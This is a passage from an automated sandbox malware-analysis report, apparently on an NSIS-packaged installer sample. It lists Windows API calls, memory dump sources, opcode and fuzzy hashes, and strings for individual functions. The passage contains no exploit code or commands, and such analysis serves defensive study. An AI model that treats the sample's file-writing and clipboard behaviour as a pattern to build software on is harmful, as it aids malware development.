                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                            • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                            • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                            • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040774B Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1375471231-0
                                                                                                                            • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                            • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                            • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                            • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404316 Relevance: 2.5, APIs: 2, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                            • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                            • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                            • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B31 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                            • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                            • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                            • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040183B Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32 ref: 00401855
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                            • Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
                                                                                                                            • Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                            • Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0040710B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 358windowclipboardmemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1085758737-890720360
                                                                                                                            • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                            • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                            • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                            • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401000 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 165COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                            • String ID: 8_o$NSIS Software Setup
                                                                                                                            • API String ID: 2207649800-4053800098
                                                                                                                            • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                            • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                            • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                            • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408311 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 176filememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                              • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                              • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                              • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                            • wsprintfA.USER32 ref: 004083FF
                                                                                                                            • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                            • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                            • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                              • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                              • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                            • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                            • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                            • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1472977481-890720360
                                                                                                                            • Opcode ID: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                            • Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
                                                                                                                            • Opcode Fuzzy Hash: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                            • Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405C44 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 327COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                            • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                              • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                              • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                              • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                              • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                              • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                            • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                            • String ID: .ro$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$8_o$A
                                                                                                                            • API String ID: 2917460849-1690832132
                                                                                                                            • Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                            • Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
                                                                                                                            • Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
                                                                                                                            • Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407E06 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 236stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                            • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                            • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                            • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                            • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                              • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                            Strings
                                                                                                                            • ., xrefs: 00407F41
                                                                                                                            • .ro, xrefs: 00407E16
                                                                                                                            • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 0040809D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                            • String ID: .$.ro$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
                                                                                                                            • API String ID: 3880481140-1681717863
                                                                                                                            • Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                            • Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
                                                                                                                            • Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                            • Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404F0F Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2320649405-0
                                                                                                                            • Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                            • Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
                                                                                                                            • Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                            • Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040247C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
